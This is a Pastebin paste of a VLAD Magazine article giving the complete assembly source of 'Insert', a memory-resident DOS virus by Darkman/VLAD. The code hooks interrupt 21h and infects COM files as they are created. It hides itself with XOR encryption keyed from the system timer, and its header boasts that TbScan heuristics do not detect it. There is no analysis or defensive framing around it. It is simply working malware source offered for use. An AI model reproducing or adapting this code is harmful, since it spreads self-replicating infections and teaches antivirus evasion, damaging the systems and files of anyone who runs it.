API tools faq
paste
Advertisement
FlyFar

VLAD Magazine - Issue #3 - ARTICLE.4_4 - Insert

FlyFar
Jun 29th, 2023
1,332
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 8.06 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. ;                             Darkman/VLAD
  2. ;                           Proudly Presents
  3. ;                             I N S E R T
  4. ;            - No flags with TbScan v 6.30 high heuristic -
  5.  
  6. psp          equ     100h
  7.  
  8. insert       segment
  9.              assume  cs:insert,ds:insert,es:insert
  10.              org     00h                 ; Origin of COM-file
  11.  
  12. code:
  13.              lea     di,psp+crypt         ; DI = offset of crypt
  14.              call    xorcrypt
  15. crypt:
  16.              mov     ax,6302h            ; Insert service
  17.              int     21h                 ; Do it!
  18.              cmp     ax,bx               ; Already resident?
  19.              je      virusexit           ; Equal? Jump to virusexit
  20.  
  21.              push    ds                  ; Save DS at stack
  22.              mov     ax,ds
  23.              dec     ax                  ; Decrease AX
  24.              mov     ds,ax               ; DS = segment of programs MCB
  25.  
  26.              cmp     byte ptr ds:[00h],'Z'
  27.              jne     insexit             ; Not last in chain? Jump to insexit
  28.              sub     word ptr ds:[03h],(02h*(codeend-code)+0fh)/10h
  29.              sub     word ptr ds:[12h],(02h*(codeend-code)+0fh)/10h
  30.              add     ax,ds:[03h]         ; AX = MCB + size of memory block
  31.              inc     ax                  ; AX = first usable MCB segment
  32.              pop     ds                  ; Load DS from stack
  33.  
  34.              cld                         ; Clear direction flag
  35.              push    es                  ; Save ES at stack
  36.              mov     es,ax               ; ES = first usable program segment
  37.              mov     cx,(codeend-code)   ; Move 271 bytes
  38.              xor     di,di               ; Clear DI
  39.              lea     si,psp+code         ; SI = offset of code
  40.              rep     movsb               ; Move virus to high memory
  41.  
  42.              xor     ax,ax               ; Clear AX
  43.              mov     ds,ax               ; DS = segment of interrupt table
  44.              lea     di,int21adr         ; DI = offset of int21adr
  45.              mov     si,(21h*04h)        ; SI = offset of interrupt 21h
  46.              movsw                       ; Store address of interrupt 21h \
  47.              movsw                       ; in int21adr                    /
  48.              mov     word ptr ds:[21h*04h],offset virusint21
  49.              mov     ds:[21h*04h+02h],es ; Intercept interrupt 21h
  50.              pop     es                  ; Load ES from stack
  51.              push    es                  ; Save ES at stack
  52. insexit:
  53.              pop     ds                  ; Load DS from stack (ES)
  54. virusexit:
  55.              mov     ax,65535-(restoreend-restore)
  56.              mov     cx,(restoreend-restore)
  57.              mov     di,ax               ; DI = offset of end of memory
  58.              lea     si,psp+restore      ; SI = offset of restore
  59.              rep     movsb               ; Move restore code to end of memory
  60.              jmp     ax                  ; Jump to restore
  61.  
  62. virusint21   proc    near                ; Interrupt 21h of Insert
  63.              pushf                       ; Save flags at stack
  64.  
  65.              cmp     ah,3ch              ; Create a file?
  66.              je      infectfile          ; Equal? Jump to infectfile
  67.              cmp     ah,5bh              ; Create new file?
  68.              je      infectfile          ; Equal? Jump to infectfile
  69.              cmp     ax,6302h            ; Insert service?
  70.              je      insservice          ; Equal? Jump to insservice
  71.  
  72.              popf                        ; Load flags from stack
  73. jumpfar      db      0eah                ; Object code of jump far
  74. int21adr     dd      ?                   ; Address of interrupt 21h
  75. insservice:
  76.              mov     bx,ax
  77.              popf                        ; Load flags from stack
  78.              iret                        ; Interrupt return!
  79. infectfile:
  80.              call    dword ptr cs:int21adr
  81.              pushf                       ; Save flags at stack
  82.              jc      createerror         ; Error? Jump to createerror
  83.  
  84.              push    ax                  ; Save AX at stack
  85.              push    bx                  ; Save BX at stack
  86.              push    di                  ; Save DI at stack
  87.              push    es                  ; Save ES at stack
  88.  
  89.              xchg    ax,bx               ; Exchange AX with BX
  90.  
  91.              mov     ax,1220h            ; Get system file table number
  92.              int     2fh                 ; Do it! (multiplex)
  93.  
  94.              push    bx                  ; Save BX at stack
  95.              mov     ax,1216h            ; Get address of system FCB
  96.              mov     bl,es:[di]          ; BL = system file table entry
  97.              int     2fh                 ; Do it! (multiplex)
  98.              pop     bx                  ; Load BX from stack
  99.  
  100.              cmp     word ptr es:[di+28h],'OC'
  101.              jne     exterror            ; Not equal? Jump to exterror
  102.              cmp     byte ptr es:[di+2ah],'M'
  103.              jne     exterror            ; Not equal? Jump to exterror
  104.  
  105.              push    cx                  ; Save CX at stack
  106.              push    dx                  ; Save DX at stack
  107.              push    si                  ; Save SI at stack
  108.              push    ds                  ; Save DS at stack
  109.  
  110.              push    cs                  ; Save CS at stack
  111.              pop     ds                  ; Load DS from stack
  112.              push    cs                  ; Save CS at stack
  113.              pop     es                  ; Load ES from stack
  114.  
  115.              in      ax,40h              ; AX = port 40h
  116.              mov     cryptvalues,ax      ; Store the crypt value
  117.  
  118.              mov     cx,(codeend-code)   ; Move 271 bytes
  119.              lea     di,codeend          ; DI = offset of codeend
  120.              lea     si,code             ; SI = offset of code
  121.              rep     movsb               ; Move virus to high memory
  122.  
  123.              lea     di,codeend+06h      ; DI = offset of crypt
  124.              call    xorcrypt
  125.  
  126.              mov     ah,40h              ; Write to file
  127.              mov     cx,(codeend-code)   ; Write 271 bytes
  128.              lea     dx,codeend          ; DX = offset of codeend
  129.              int     21h                 ; Do it!
  130.  
  131.              pop     ds                  ; Load DS from stack
  132.              pop     si                  ; Load SI from stack
  133.              pop     dx                  ; Load DX from stack
  134.              pop     cx                  ; Load CX from stack
  135. exterror:
  136.              pop     es                  ; Load ES from stack
  137.              pop     di                  ; Load DI from stack
  138.              pop     bx                  ; Load BX from stack
  139.              pop     ax                  ; Load AX from stack
  140. createerror:
  141.              popf                        ; Load flags from stack
  142.  
  143.              retf    02h                 ; Return far and pop a word!
  144.              endp
  145.  
  146. restore      proc    near                ; Restore code of original program
  147.              lea     ax,psp+code         ; AX = beginning of code
  148.              mov     di,ax
  149.              lea     si,psp+codeend      ; SI = offset of real code
  150.              mov     cx,(65535-psp-(restoreend-restore))-(codeend-code)
  151.              rep     movsb               ; Move the real code to the beginning
  152.              jmp     ax                  ; Jump to the real code
  153.              endp
  154. restoreend:
  155. virusname    db      ' [Insert]'         ; Name of the virus
  156. virusauthor  db      ' [Darkman/VLAD] '  ; Author of the virus
  157. cryptend:
  158. xorcrypt     proc    near                ; XOR Encrypt/Decrypt
  159.              mov     cx,(cryptend-crypt)/02h
  160. cryptcode:
  161. xorwordptr   db      81h,35h             ; xor word ptr [di],0000h \
  162. cryptvalues  dw      ?                   ;  "   "    "      "      /
  163.              inc     di                  ; Increase DI
  164.              inc     di                  ; Increase DI
  165.              loop    cryptcode
  166.              ret                         ; Return!
  167.              endp
  168. codeend:
  169.              int     20h                 ; Exit to DOS!
  170.  
  171. insert       ends
  172. end          code
Tags: vlad
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!